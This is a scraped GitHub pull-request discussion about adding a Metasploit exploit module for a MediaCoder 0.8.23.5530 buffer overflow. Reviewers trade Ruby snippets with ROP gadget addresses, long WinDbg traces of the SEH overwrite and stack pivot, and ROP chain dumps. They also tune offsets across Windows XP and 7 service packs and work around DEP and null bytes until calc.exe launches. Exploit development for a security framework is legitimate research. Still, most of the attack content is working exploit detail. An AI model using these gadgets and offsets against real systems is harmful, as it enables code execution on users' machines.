New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Added MediaCoder exploit module #2081
Conversation
end | ||
|
||
def nops(rop=false, n=1) | ||
return rop ? [0x6ab21799] * n : [0x90909090] * n |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I guess this gadget (ret gadget at 0x6ab21799? ) is target specific (MediaCoder 0.8.23.5530 in this case). If it's the case, should be on the target metadata.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Yes you're correct. I'll change it to 0x6ab16202 from swscale-2.dll, that would be universal I think..
end | ||
|
||
def junk(n=1) | ||
return [rand_text_alpha(4).unpack("L")[0]] * n |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Why is the random text repeated n
times instead of generating different junk by calling rand_text_alpha(4).unpack("L")[0]
n
times? That would make the exploit's junk code more random when n > 1
.
Processing... |
'Author' => | ||
[ | ||
'metacom', # Vulnerability discovery and PoC | ||
'modpr0be <modpr0be[at]spentera.com>' # Metasploit module |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
A comma is needed at the end of entry
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Strange, msftidy doesn't complain about it. Will add it on next commit.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
msftidy doesn't check this. But if you run msfconsole, you will see a complaint though :-)
Works for me on Win XP SP3:
mediacoder version:
Juan, are you on XP too? |
No win7 sp1, okey, giving a new chance, starting with XP SP 3 8.23.5530 |
Windows XP SP3 with Windows XP SP 3 8.23.5530
oooough! Finaly triggered... needed interact several times with the GUI to make it crash btw, add the list, click the link, lose the window focus, get the window focus, click the link again:
This time the ret is well aligned and calc spawns:
Now switching to Win 7 SP1. |
Again no luck on Win 7 SP1 on my tests, sorry:
|
Notice on Windows 7, both Juan and I have the exact same ESP address when we do the "ADD ESP, 7ACh" alignment, and then we both experience the same crash due to a bad landing. The ESP address at the time of the alignment also appears to be consistent after retries. I did a quick comparison between a successful attempt on XP vs Win 7, it looks like we're still 0x168 bytes off from the ROP NOP we need:
I'm not very sure why the starting ESP is so different even though we're all on Win 7 SP1. I can only assume maybe somewhere during window subclassing, the system decided to do something different - a condition we need to control. |
I put more testing with another physical box, MediaCoder 0.8.23.5530 with Win 7. (1008.14cc): Break instruction exception - code 80000003 (first chance)
eax=7ffdd000 ebx=00000000 ecx=00000000 edx=7791d5cb esi=00000000 edi=00000000
eip=778b3258 esp=0185ff5c ebp=0185ff88 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SYSTEM32\ntdll.dll -
ntdll!DbgBreakPoint:
778b3258 cc int 3
0:013> g
ModLoad: 6d900000 6d958000 C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
ModLoad: 73ac0000 73bbb000 C:\Windows\system32\WindowsCodecs.dll
ModLoad: 6dd70000 6dda1000 C:\Windows\system32\EhStorShell.dll
ModLoad: 762e0000 7647d000 C:\Windows\system32\SETUPAPI.dll
ModLoad: 75a70000 75a97000 C:\Windows\system32\CFGMGR32.dll
ModLoad: 75a50000 75a62000 C:\Windows\system32\DEVOBJ.dll
ModLoad: 74550000 74645000 C:\Windows\system32\PROPSYS.dll
ModLoad: 6dd00000 6dd6a000 C:\Windows\System32\cscui.dll
ModLoad: 6dcf0000 6dcf9000 C:\Windows\System32\CSCDLL.dll
ModLoad: 723c0000 723cb000 C:\Windows\system32\CSCAPI.dll
ModLoad: 6dc80000 6dcef000 C:\Windows\system32\ntshrui.dll
ModLoad: 75720000 75739000 C:\Windows\system32\srvcli.dll
ModLoad: 741e0000 741ea000 C:\Windows\system32\slc.dll
ModLoad: 73c40000 73c6f000 C:\Windows\system32\xmllite.dll
ModLoad: 6d990000 6da24000 C:\Windows\system32\MsftEdit.dll
ModLoad: 73c40000 73c6f000 C:\Windows\system32\xmllite.dll
ModLoad: 68bb0000 68c3c000 C:\Windows\system32\UIAutomationCore.dll
ModLoad: 75960000 759bf000 C:\Windows\system32\SXS.DLL
ModLoad: 68b20000 68b7c000 C:\Windows\System32\StructuredQuery.dll
ModLoad: 757a0000 757a8000 C:\Windows\System32\Secur32.dll
ModLoad: 6db00000 6db4e000 C:\Windows\system32\actxprxy.dll
ModLoad: 6e850000 6e87b000 C:\Program Files\Internet Explorer\ieproxy.dll
ModLoad: 732c0000 732d6000 C:\Windows\system32\thumbcache.dll
ModLoad: 6e9a0000 6ea3f000 C:\Windows\system32\SearchFolder.dll
ModLoad: 6dad0000 6dafe000 C:\Windows\system32\SHDOCVW.dll
ModLoad: 6d270000 6d408000 C:\Windows\system32\NetworkExplorer.dll
ModLoad: 73080000 73092000 C:\Windows\system32\MPR.dll
ModLoad: 73200000 73208000 C:\Windows\System32\drprov.dll
ModLoad: 74c50000 74c79000 C:\Windows\System32\WINSTA.dll
ModLoad: 696f0000 69704000 C:\Windows\System32\ntlanman.dll
ModLoad: 6c0f0000 6c107000 C:\Windows\System32\davclnt.dll
ModLoad: 6fdd0000 6fdd8000 C:\Windows\System32\DAVHLPR.dll
ModLoad: 6dac0000 6dac9000 C:\Windows\system32\LINKINFO.dll
ModLoad: 74dd0000 74ddf000 C:\Windows\system32\wkscli.dll
ModLoad: 75200000 75209000 C:\Windows\system32\netutils.dll
(1008.17e4): Unknown exception - code 000006ba (first chance)
ModLoad: 66550000 66788000 C:\Windows\system32\wpdshext.dll
ModLoad: 74e00000 74f90000 C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7600.16385_none_72fc7cbf861225ca\gdiplus.dll
ModLoad: 6fd40000 6fdc9000 C:\Windows\system32\PortableDeviceApi.dll
ModLoad: 6edc0000 6edeb000 C:\Windows\system32\PortableDeviceTypes.dll
ModLoad: 696b0000 696ef000 C:\Windows\system32\audiodev.dll
ModLoad: 67b30000 67d97000 C:\Windows\system32\WMVCore.DLL
ModLoad: 69650000 6968d000 C:\Windows\system32\WMASF.DLL
ModLoad: 68b80000 68ba2000 C:\Windows\system32\EhStorAPI.dll
ModLoad: 05a70000 05ad1000 image05a70000
ModLoad: 05a70000 05ad1000 image05a70000
(1008.988): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000005e ebx=764dcc28 ecx=04d61b28 edx=fb3ce4d8 esi=005308c8 edi=000a032a
eip=0042daf3 esp=0012f090 ebp=0012f1f4 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210286
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\mediacoder.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\MediaCoder\mediacoder.exe
mediacoder+0x2daf3:
0042daf3 88040a mov byte ptr [edx+ecx],al ds:0023:00130000=41 0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll -
postproc_52+14435 (6afd4435)
Invalid exception stack at 7cc6f481
0:000> bp 6afd4435
0:000> g
Breakpoint 0 hit eax=00000000 ebx=00000000 ecx=6afd4435 edx=778c62ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000 add esp,7ACh
0:000> t
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=778c62ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000 add esp,7ACh
0:000> t
eax=00000000 ebx=00000000 ecx=6afd4435 edx=778c62ad esi=00000000 edi=00000000
eip=6afd443b esp=0012f454 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443b:
6afd443b 5b pop ebx
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\jpeg.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\jpeg.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\libiconv-2.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\avutil-52.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\swscale-2.dll -
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=778c62ad esi=00000000 edi=00000000
eip=6afd443c esp=0012f458 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443c:
6afd443c 5e pop esi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=778c62ad esi=6ab16202 edi=00000000
eip=6afd443d esp=0012f45c ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443d:
6afd443d 5f pop edi
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=778c62ad esi=6ab16202 edi=6ab16202
eip=6afd443e esp=0012f460 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443e:
6afd443e 5d pop ebp
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=778c62ad esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f464 ebp=6ab16202 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443f:
6afd443f c3 ret
0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=778c62ad esi=6ab16202 edi=6ab16202
eip=6ab16202 esp=0012f468 ebp=6ab16202 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
swscale_2!sws_get_class+0xf002:
6ab16202 c3 ret ESP points to: 0:000> dd esp
0012f468 6ab16202 6ab16202 6ab16202 6ab16202
0012f478 6ab16202 6ab16202 6ab16202 6ab16202
0012f488 100482ff ffffffc0 63547658 66d9d9ba
0012f498 6ab2241d 4b657443 4b657443 4b657443
0012f4a8 4b657443 4b657443 4b657443 4b657443
0012f4b8 4b657443 4b657443 4b657443 4b657443
0012f4c8 4b657443 4b657443 4b657443 4b657443
0012f4d8 1004cc03 6ab561b0 66d9feee 6ab19780
0:000> dd /c1 esp
0012f468 6ab16202
0012f46c 6ab16202
0012f470 6ab16202
0012f474 6ab16202
0012f478 6ab16202
0012f47c 6ab16202
0012f480 6ab16202
0012f484 6ab16202
0012f488 100482ff
0012f48c ffffffc0
0012f490 63547658
0012f494 66d9d9ba
0012f498 6ab2241d
0012f49c 4b657443
0012f4a0 4b657443
0012f4a4 4b657443
0012f4a8 4b657443
0012f4ac 4b657443
0012f4b0 4b657443
0012f4b4 4b657443
0012f4b8 4b657443
0012f4bc 4b657443
0012f4c0 4b657443
0012f4c4 4b657443
0012f4c8 4b657443
0012f4cc 4b657443
0012f4d0 4b657443
0012f4d4 4b657443
0012f4d8 1004cc03
0012f4dc 6ab561b0
0012f4e0 66d9feee
0012f4e4 6ab19780 Windows version: 0:000> version
Windows 7 Version 7600 MP (4 procs) Free x86 compatible
Product: WinNt, suite: SingleUserTS
kernel32.dll version: 6.1.7600.16385 (win7_rtm.090713-1255)
Machine Name:
Debug session time: Tue Jul 9 10:57:48.363 2013 (GMT+7)
System Uptime: 0 days 0:23:06.472
Process Uptime: 0 days 0:09:18.685
Kernel time: 0 days 0:00:01.138
User time: 0 days 0:00:00.546
Live user mode: <Local>
Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
Copyright (c) Microsoft Corporation. All rights reserved.
command line: '"C:\Program Files\Debugging Tools for Windows (x86)\windbg.exe" ' Debugger Process 0x173C
dbgeng: image 6.11.0001.404, built Thu Feb 26 08:55:43 2009
[path: C:\Program Files\Debugging Tools for Windows (x86)\dbgeng.dll]
dbghelp: image 6.11.0001.404, built Thu Feb 26 08:55:30 2009
[path: C:\Program Files\Debugging Tools for Windows (x86)\dbghelp.dll]
DIA version: 11212
Extension DLL search Path:
C:\Program Files\Debugging Tools for Windows (x86)\WINXP;C:\Program Files\Debugging Tools for Windows (x86)\winext;C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\Program Files\Debugging Tools for Windows (x86)\pri;C:\Program Files\Debugging Tools for Windows (x86);C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\ThinkPad\Bluetooth Software\;C:\Program Files\Intel\WiFi\bin\;C:\Program Files\Common Files\Intel\WirelessCommon\;C:\Program Files\Common Files\Lenovo;C:\Program Files\Common Files\Ulead Systems\MPEG;C:\Program Files\Lenovo\Access Connections\;C:\Program Files\Lenovo\Client Security Solution
Extension DLL chain:
dbghelp: image 6.11.0001.404, API 6.1.6, built Thu Feb 26 08:55:30 2009
[path: C:\Program Files\Debugging Tools for Windows (x86)\dbghelp.dll]
ext: image 6.11.0001.404, API 1.0.0, built Thu Feb 26 08:55:30 2009
[path: C:\Program Files\Debugging Tools for Windows (x86)\winext\ext.dll]
exts: image 6.11.0001.404, API 1.0.0, built Thu Feb 26 08:55:24 2009
[path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\exts.dll]
uext: image 6.11.0001.404, API 1.0.0, built Thu Feb 26 08:55:26 2009
[path: C:\Program Files\Debugging Tools for Windows (x86)\winext\uext.dll]
ntsdexts: image 6.1.7015.0, API 1.0.0, built Thu Feb 26 08:54:43 2009
[path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\ntsdexts.dll] Same result as mine. Any idea how to resolve this? Maybe add more ROP NOP (0x00000168). It would be good if this module support DEP, since mediacoder.exe is DEP aware. |
Errh, accidentally click the close & comment button. |
it's not that uncommon to see offset differences between Win7 x86 and Win7 x64 (wow64) - a ROP NOP landing zone should take care of that |
I see modpr0be tested on a Win 7 SP0 box based on his kernel32.dll info, so I setup the same Win 7 box, and then I got it to work:
So perhaps the offset is more specific to the service pack, rather than wow64 vs x86 this time?? I think Juan has been testing on Win 7 SP1, right? If the module doesn't work reliably on SP1, then I suggest:
Either way works for me. |
Actually, my test before the last one was tested in Win 7 SP1: 0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll -
postproc_52+14435 (6afd4435)
Invalid exception stack at e82d1026
0:000> bp 6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76f371ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000 add esp,7ACh
0:000> p
eax=00000000 ebx=00000000 ecx=6afd4435 edx=76f371ad esi=00000000 edi=00000000
eip=6afd443b esp=0012f454 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443b:
6afd443b 5b pop ebx
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76f371ad esi=00000000 edi=00000000
eip=6afd443c esp=0012f458 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443c:
6afd443c 5e pop esi
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76f371ad esi=6ab16202 edi=00000000
eip=6afd443d esp=0012f45c ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443d:
6afd443d 5f pop edi
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76f371ad esi=6ab16202 edi=6ab16202
eip=6afd443e esp=0012f460 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443e:
6afd443e 5d pop ebp
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=76f371ad esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f464 ebp=6ab16202 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443f:
6afd443f c3 ret
0:000> dd esp L1
0012f464 6ab16202 <-------- Hit the rop nop as we wanted. Windows version: 0:000> version
Windows 7 Version 7601 (Service Pack 1) MP (2 procs) Free x86 compatible
Product: WinNt, suite: SingleUserTS
kernel32.dll version: 6.1.7601.18015 (win7sp1_gdr.121129-1432)
Machine Name:
Debug session time: Tue Jul 9 12:49:47.327 2013 (UTC + 7:00)
System Uptime: 0 days 0:08:58.106
Process Uptime: 0 days 0:03:30.334
Kernel time: 0 days 0:00:01.747
User time: 0 days 0:00:02.137
Live user mode: <Local>
Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.
command line: '"C:\Program Files\Debugging Tools for Windows (x86)\windbg.exe" ' Debugger Process 0x15D4
dbgeng: image 6.12.0002.633, built Tue Feb 02 03:08:31 2010
[path: C:\Program Files\Debugging Tools for Windows (x86)\dbgeng.dll]
dbghelp: image 6.12.0002.633, built Tue Feb 02 03:08:26 2010
[path: C:\Program Files\Debugging Tools for Windows (x86)\dbghelp.dll]
DIA version: 20921
Extension DLL search Path:
C:\Program Files\Debugging Tools for Windows (x86)\WINXP;C:\Program Files\Debugging Tools for Windows (x86)\winext;C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\Program Files\Debugging Tools for Windows (x86)\pri;C:\Program Files\Debugging Tools for Windows (x86);C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Python27;C:\Python27\Lib;C:\Program Files\GNU\GnuPG\pub;C:\Program Files\Windows Live\Shared;C:\Program Files\QuickTime\QTSystem\;C:\Program Files\Microsoft Windows Performance Toolkit\;C:\Program Files\OpenVPN\bin;C:\Program Files\Nmap
Extension DLL chain:
dbghelp: image 6.12.0002.633, API 6.1.6, built Tue Feb 02 03:08:26 2010
[path: C:\Program Files\Debugging Tools for Windows (x86)\dbghelp.dll]
ext: image 6.12.0002.633, API 1.0.0, built Tue Feb 02 03:08:31 2010
[path: C:\Program Files\Debugging Tools for Windows (x86)\winext\ext.dll]
exts: image 6.12.0002.633, API 1.0.0, built Tue Feb 02 03:08:24 2010
[path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\exts.dll]
uext: image 6.12.0002.633, API 1.0.0, built Tue Feb 02 03:08:23 2010
[path: C:\Program Files\Debugging Tools for Windows (x86)\winext\uext.dll]
ntsdexts: image 6.1.7650.0, API 1.0.0, built Tue Feb 02 03:08:08 2010
[path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\ntsdexts.dll] |
I fixed the exploit() function to make it work on my box. Although it works, it's not very ideal because the pivot aligns ESP so much (0x7AC), this forces my payload to be very close to the edge of the uncommitted memory. That pretty much means if my payload is too big, the VirtualProtect function won't be able to mark the region RWX. I had to make the size parameter dynamic, because the original hardcoded value to NEG is too big. To overcome the size problem above, it's possible to put an egghunter (that uses VirtualProtect, too) instead of the payload, and then look for a way to put the payload somewhere else for the hunger to find it. But I didn't investigate approach this further. I'm not even sure if this modified function breaks the current one, but anyways, here's my version:
|
Working on W7 SP1 after applying @wchen-r7 changes:
|
if payload cannot contain nulls, then perhaps a check is needed to ensure that "0xffffffff - p.length + 1" will never contain a null byte |
I don't really have a pretty way to do this, but to avoid a null byte in his length value, I guess he can do something like:
|
Doesn't work with @wchen-r7 changes, using windows/exec: (1ce8.ff4): Break instruction exception - code 80000003 (first chance)
eax=7ffde000 ebx=00000000 ecx=00000000 edx=7707f17d esi=00000000 edi=00000000
eip=7701410c esp=01d3ff5c ebp=01d3ff88 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!DbgBreakPoint:
7701410c cc int 3
0:027> g
(1ce8.1af4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000008c ebx=7714ad60 ecx=04bf8b20 edx=fb5374e0 esi=005308c8 edi=000707be
eip=0042daf3 esp=0012f090 ebp=0012f1f4 iopl=0 nv up ei ng nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210282
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\mediacoder.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\MediaCoder\mediacoder.exe
mediacoder+0x2daf3:
0042daf3 88040a mov byte ptr [edx+ecx],al ds:0023:00130000=41
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll -
0:000> !exchain
0012f3f4: postproc_52+14435 (6afd4435)
Invalid exception stack at 6afc1446
0:000> bp 6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=770271ad esi=00000000 edi=00000000
eip=6afd4435 esp=0012eca8 ebp=0012ecc8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000 add esp,7ACh
0:000> p
eax=00000000 ebx=00000000 ecx=6afd4435 edx=770271ad esi=00000000 edi=00000000
eip=6afd443b esp=0012f454 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443b:
6afd443b 5b pop ebx
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\MediaCoder\swscale-2.dll -
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=770271ad esi=00000000 edi=00000000
eip=6afd443c esp=0012f458 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443c:
6afd443c 5e pop esi
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=770271ad esi=6ab16202 edi=00000000
eip=6afd443d esp=0012f45c ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443d:
6afd443d 5f pop edi
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=770271ad esi=6ab16202 edi=6ab16202
eip=6afd443e esp=0012f460 ebp=0012ecc8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443e:
6afd443e 5d pop ebp
0:000> p
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=770271ad esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f464 ebp=6ab16202 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
postproc_52+0x1443f:
6afd443f c3 ret
0:000> dd esp L1
0012f464 6ab16202 <-- landed at ROP NOP address
0:000> dd /c1 esp+0x7cc <-- but need 0x7cc to get first gadget
0012fc30 6ab16202
0012fc34 100482ff <-- first rop gadget in rop_gadgets
0012fc38 ffffffc0
0012fc3c 4655546e
0012fc40 66d9d9ba
0012fc44 6ab2241d
0012fc48 71757656
0012fc4c 71757656
0012fc50 71757656
0012fc54 71757656
0012fc58 71757656
0012fc5c 71757656
0012fc60 71757656
0012fc64 71757656
0012fc68 71757656
0012fc6c 71757656
0012fc70 71757656
0012fc74 71757656
0012fc78 71757656
0012fc7c 71757656
0012fc80 71757656
0012fc84 1004a8ee
0012fc88 6ab561b0
0012fc8c 66d9feee
0012fc90 6ab19780
0012fc94 66d929f5
0012fc98 ffffff1b
0012fc9c 444f6850
0012fca0 6ab3c65a
0012fca4 1004cc03
0012fca8 ffffffff
0012fcac 660166e9 Tested in both physical and VM (Virtual Box) environment, both gave me same result, the calc.exe never show up. If you guys already tested and worked on Windows 7 SP0, then probably I should remove the SP1, change to SP0. |
Yeah, that'd be great. Thanks. |
Merged, thanks. |
This is an exploit module for MediaCoder exploit from exploit-db.com, EDB-ID 26403